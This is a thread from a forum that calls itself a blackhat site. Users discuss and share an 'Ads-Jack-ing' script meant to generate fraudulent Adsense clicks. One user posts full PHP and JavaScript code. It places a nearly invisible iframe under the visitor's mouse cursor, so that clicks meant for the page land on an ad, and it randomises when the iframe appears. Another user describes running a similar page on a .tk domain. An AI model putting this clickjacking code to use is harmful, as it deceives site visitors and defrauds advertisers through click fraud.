Best Blackhat Forum

Full Version: [SUPER~HOT] Adsense Ads Hacked SCRIPT PHP I try
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7
awesome.. would you share the method? please:)
-_- .. just share the script.
i just cant understand this !! but anyways if anyone can tell me all about this , just pm me !! and i advice u all not to use this maybe cause u can get a ban !! try on a new account !!
Im currently trying this out with Yllix.. I'm not yet sure how much yllix pays for clicks but I don't want to risk my adsense acc. I made a .tk for it ---> http://txt2sawa.tk/index.html

I made the whole page as the actual ad. if a user clicks anywhere on the page.. my ad gets clicked. ^_^

It's working fine.. thanks for sharing!! :)
could someone share the script
This seems nothing more than simple iframing which is forced to click on ads.... thou thanks for the script man... :)
how to use this i wordpress, i have tried but nothing yet.
any idea what to change or where to place she code ?


Code:
<?php session_start(); ?>
<html>
    <head>
        <title>Ads-Jack-ing</title>
<style>
iframe.sendframe {
opacity:0.1;
position:absolute;
overflow:hidden;
top:100;
left:100;
}
</style>

        <!--
Change opacity above, set to higher if you want like to 0.4 to be more visable
-->
<script>
document.onmousemove = mouseMove;
function mouseMove(ev){
ev = ev || window.event;
var mousePos = mouseCoords(ev);
document.getElementById('sendframe').style.left=mousePos.x-60;
document.getElementById('sendframe').style.top=mousePos.y-53;
}
function mouseCoords(ev){
if(ev.pageX || ev.pageY){
return {x:ev.pageX, y:ev.pageY};
}
return {
x:ev.clientX + document.body.scrollLeft - document.body.clientLeft,
y:ev.clientY + document.body.scrollTop  - document.body.clientTop
};
}
</script>

    </head>
<body>
<?
$i=mt_rand(1,3);
if($i==2){
echo "<iframe src=\"ignore-this.html\" id=\"sendframe\" class=\"sendframe\" frameborder=\"0\" scrolling=\"no\" width=\"100\" height=\"100\"></iframe>";
}
?>
<!-- iFrame to ignore-this.html, simple iframe code within a webpage will suffice" -->
</body>
</html>
how to use this in wordpress, any one tried?
hah, use the script and i guarantee you that your ad-sense will get flagged -> banned. Gl!
Pages: 1 2 3 4 5 6 7
Reference URL's